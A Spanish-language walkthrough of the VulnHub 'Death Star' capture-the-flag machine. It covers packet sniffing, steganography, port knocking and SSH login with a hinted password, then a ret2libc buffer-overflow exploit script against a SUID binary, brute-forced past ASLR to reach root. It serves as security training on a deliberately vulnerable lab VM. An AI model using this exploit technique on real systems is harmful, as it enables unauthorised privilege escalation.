[VLN] DeathStar

Hoy vamos a hackear la maquina de Vulnhub llamada Death Star. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/death-star-1,477/
  • Video
  • Enumeration
  • En esta maquina nmap nos sirve de poco :) El primer paso es abrir Wireshark y filtramos por la ip de la maquina victima con el siguiente filtro:
    ip.addr == 192.168.1.95
    Con paciencia, veremos que recibimos 2 paquetes UDP que contienen la siguiente informacion:
    Thanks to the successful Operation Skyhook, the Rebel Alliance got some plans for the new weapon of the Galactic Empire. We know that there is a small opening that we can explore through a thermal exhaust that is directly connected to the Main Reactor of the Death Star. The superlaser takes 1440 minutes to reload. It is very important to observe 'this window' in order to recover the blueprint. This is because, it is only possible to make an attempt every 60 seconds.
    Y el otro paquete:
    Code to access the Death Star Blueprint within the time it takes to reload is: DS-1@OBS
    Leyendo, nos indica el codigo de acceso (DS-1@OBS) y por otro lado vemos el numero 1440... Asi que si probamos a enviar algo de informacion por UDP al puerto 1440, nos dira algo como "Wrong Code". Como tenemos el codigo, lo enviamos, y guardamos todos los datos recibidos en el fichero death.txt. Vemos que es base64, asi que hacemos decode y lo guardamos en death2, y por ultimo, usamos file para ver que se trata de una imagen...
    sml@Cassandra:~$ echo -e "DS-1@OBS" | nc -u -w1 192.168.1.95 1440 > death.txt sml@Cassandra:~$ cat death.txt | base64 -d > death2 sml@Cassandra:~$ file death2 death2: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 900x688, components 3 sml@Cassandra:~$ mv death2 death2.jpeg
    Al abrir la imagen vemos que hay un "unlock code", pero no sabemos que hacer con el. Usamos steghide y usamos el codigo anterior "DS-1@OBS" para ver si podemos extraer algo de informacion.
    sml@Cassandra:~$ steghide extract -sf death2.jpeg Anotar salvoconducto: anot los datos extraidos e/"openTheExhaust.txt".
    Exploramos el fichero que hemos extraido.
    sml@Cassandra:~$ cat openTheExhaust.txt Each segment of the "unlock code" can only contain 3 characters sent in sequence to unlock port 10110.
    Debemos separar el unlock code en cifras de 3 numeros, y luego hacer port knocking para que se abra el puerto 10110. Nos descargamos un "knocker".
    sml@Cassandra:~$ wget https://raw.githubusercontent.com/grongor/knock/master/knock -O knock.py --2020-05-17 00:58:07-- https://raw.githubusercontent.com/grongor/knock/master/knock Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133 Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado. PeticiÃġn HTTP enviada, esperando respuesta... 200 OK Longitud: 2932 (2,9K) [text/plain] Grabando a: âknock.pyâ knock.py 100%[=========================================================================== =======>] 2,86K --.-KB/s en 0s 2020-05-17 00:58:07 (28,8 MB/s) - âknock.py guardado [2932/2932]
    Ejecutamos:
    sml@Cassandra:~$ python3 knock.py 192.168.1.95 197 719 801 983
    Y probamos a conectar por ssh al puerto que nos indicaba.
    sml@Cassandra:~$ ssh 192.168.1.95 -p 10110 Devoloped by Galen Walton Erso System's user: erso Pass Hint: My wife's first name plus the year (BBY) she died. Glory to the Empire - Project DS-1: Orbital Battle Station sml@192.168.1.95's password:
    En el banner vemos que el usuario del sistema es erso, y el password es el nombre de la mujer y el ano en que murio. Si buscamos en Intrenet veremos que la mujer se llamaba Lyra y murio 13(BBY) con lo cual la password es: lyra13 Nos logueamos con el usuario erso...
  • Low Shell
  • sml@Cassandra:~$ ssh erso@192.168.1.95 -p 10110 Devoloped by Galen Walton Erso System's user: erso Pass Hint: My wife's first name plus the year (BBY) she died. Glory to the Empire - Project DS-1: Orbital Battle Station erso@192.168.1.95's password erso@deathStar1:~$
    Ya estamos dentro :) Exploramos el sistema.
    erso@deathStar1:~$ ls warning.txt erso@deathStar1:~$ cat warning.txt Message from GALEN ERSO: This is your chance. Destroy the plans of the Galactic Empire. I know that Lord Vader will not like this at all. But, this will be my chance for redemption. I hope you have enough knowledge to help destroy this new weapon. Explore the system and get 'root access' to read the secret message located at '/root/message.txt'. Hack or fail!!
    Echamos un vistazo a ficheros con permisos "especiales".
    erso@deathStar1:~$ find / -perm -4000 2>/dev/null /usr/bin/chfn /usr/bin/chsh /usr/bin/gpasswd /usr/bin/traceroute6.iputils /usr/bin/at /usr/bin/newgrp /usr/bin/sudo /usr/bin/mtr /usr/bin/pkexec /usr/bin/passwd /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/sbin/uuidd /usr/sbin/pppd /bin/su /bin/ping6 /bin/fusermount /bin/dartVader /bin/umount /bin/mount /bin/ping
    Vemos el fichero llamado /bin/dartVader.
    erso@deathStar1:~$ /bin/dartVader dartVader: Voce tem um futuro aqui. Nao seja um Lammer, busque e aprenda realmente...
    Despues de hacer pruebas, el fichero es vulnerable a ret2lib... Nos lo descargamos en nuestra maquina.
  • Exploit
  • sml@Cassandra:~$ scp -P 10110 erso@192.168.1.95:/bin/dartVader . Devoloped by Galen Walton Erso System's user: erso Pass Hint: My wife's first name plus the year (BBY) she died. Glory to the Empire - Project DS-1: Orbital Battle Station erso@192.168.1.95's password: dartVader 100% 7338 7.0MB/s 00:00
    Arrancamos GDBPeda para ver cuando "peta"...
    sml@Cassandra:~$ gdb -q dartVader Reading symbols from dartVader... (No debugging symbols found in dartVader) gdb-peda$ pattern_create 250 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4 AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAA qAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA %aA%0A%FA%b' gdb-peda$ pset arg 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4 AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAA qAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA %aA%0A%FA%b' gdb-peda$ run Starting program: /home/sml/dartVader 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4 AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAA qAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA %aA%0A%FA%b' Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0xffffd1f0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA 4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATA AqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...) EBX: 0x0 ECX: 0xffffd560 --> 0x45485300 ('') EDX: 0xffffd2ea --> 0xd5d2ff00 ESI: 0xf7fb3000 --> 0x1dfd6c EDI: 0xf7fb3000 --> 0x1dfd6c EBP: 0x65414149 ('IAAe') ESP: 0xffffd240 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATA AqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%E A%aA%0A%FA%b") EIP: 0x41344141 ('AA4A') EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x41344141 [------------------------------------stack-------------------------------------] 0000| 0xffffd240 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATA AqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%E A%aA%0A%FA%b") 0004| 0xffffd244 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAA UAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA %0A%FA%b") 0008| 0xffffd248 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAAr AAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A% FA%b") 0012| 0xffffd24c ("AgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVA AtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b ") 0016| 0xffffd250 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAA WAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b") 0020| 0xffffd254 ("AAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAu AAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b") 0024| 0xffffd258 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXA AvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b") 0028| 0xffffd25c ("MAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAA YAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x41344141 in ?? () gdb-peda$ pattern_offset 0x41344141 1093943617 found at offset: 76
    Bien, vemos que es 76. Ahora en la maquina deathStar, miramos la direccion de libc.
    erso@deathStar1:~$ ldd /bin/dartVader linux-gate.so.1 => (0xb7776000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ba000) /lib/ld-linux.so.2 (0xb7778000)
    La direccion de system...
    erso@deathStar1:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system 243: 0011b8a0 73 FUNC GLOBAL DEFAULT 12 svcerr_systemerr@@GLIBC_2.0 620: 00040310 56 FUNC GLOBAL DEFAULT 12 __libc_system@@GLIBC_PRIVATE 1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
    Direccion de exit...
    erso@deathStar1:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit 111: 00033690 58 FUNC GLOBAL DEFAULT 12 __cxa_at_quick_exit@@GLIBC_2.10 139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0 446: 000336d0 268 FUNC GLOBAL DEFAULT 12 __cxa_thread_atexit_impl@@GLIBC_2.18 554: 000b8634 24 FUNC GLOBAL DEFAULT 12 _exit@@GLIBC_2.0 609: 0011e780 56 FUNC GLOBAL DEFAULT 12 svc_exit@@GLIBC_2.0 645: 00033660 45 FUNC GLOBAL DEFAULT 12 quick_exit@@GLIBC_2.10 868: 00033490 84 FUNC GLOBAL DEFAULT 12 __cxa_atexit@@GLIBC_2.1.3 1037: 00128ce0 60 FUNC GLOBAL DEFAULT 12 atexit@GLIBC_2.0 1380: 001ad204 4 OBJECT GLOBAL DEFAULT 31 argp_err_exit_status@@GLIBC_2.1 1492: 000fb610 62 FUNC GLOBAL DEFAULT 12 pthread_exit@@GLIBC_2.0 2090: 001ad154 4 OBJECT GLOBAL DEFAULT 31 obstack_exit_failure@@GLIBC_2.0 2243: 00033290 77 FUNC WEAK DEFAULT 12 on_exit@@GLIBC_2.0 2386: 000fc180 2 FUNC GLOBAL DEFAULT 12 __cyg_profile_func_exit@@GLIBC_2.2
    Y por ultimo, direccion de "bin/sh"...
    erso@deathStar1:~$ strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh" 162d4c /bin/sh
    Teniendo estos datos, montamos nuestro exploit quedando de la siguiente manera:
    erso@deathStar1:~$ cat ret.py import struct def le(addr): return struct.pack("I",addr) junk = "A"*76 libcbase = 0xb75a5000 libcsystem = le(libcbase + 0x00040310) libcexit = le(libcbase + 0x00033260) libcsh = le(libcbase + 0x00162d4c) print junk + libcsystem + libcexit + libcsh
    Como ASLR esta activado, si ejecutamos el exploit una sola vez probablemente no funcione, asi que hacemos un bucle "while" para que se ejecute hasta que funcione.
  • Privilege Escalation
  • erso@deathStar1:~$ while true;do /bin/dartVader $(python ret.py);done Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Illegal instruction (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) Segmentation fault (core dumped) # id uid=1000(erso) gid=1000(erso) euid=0(root) groups=0(root),1000(erso)
    Y ya seriamos root!
  • root.txt
  • # cd /root # ls message.txt # cat mess cat: mess: No such file or directory # cat message.txt Art by Shanaka Dias .==. ()''()-. .---. ;--; / .'_:___". _..'. __'. |__ --==|'-''' \'...; [ ] :[| |---\ |__| I=[| .' '. / / ____| : '._ |-/.____.' | : : snd /___\ /___\ '-'._----' ------------------------------------- Congratulations!! You helped me destroy the empire's weapon. ------------------------------------- If you had fun, love to get your feedback. Send me a tweet @mrhenrike ;) Until the next VM and "May the force be with you".
  • End
  • Y con esto ya seriamos root de la maquina :)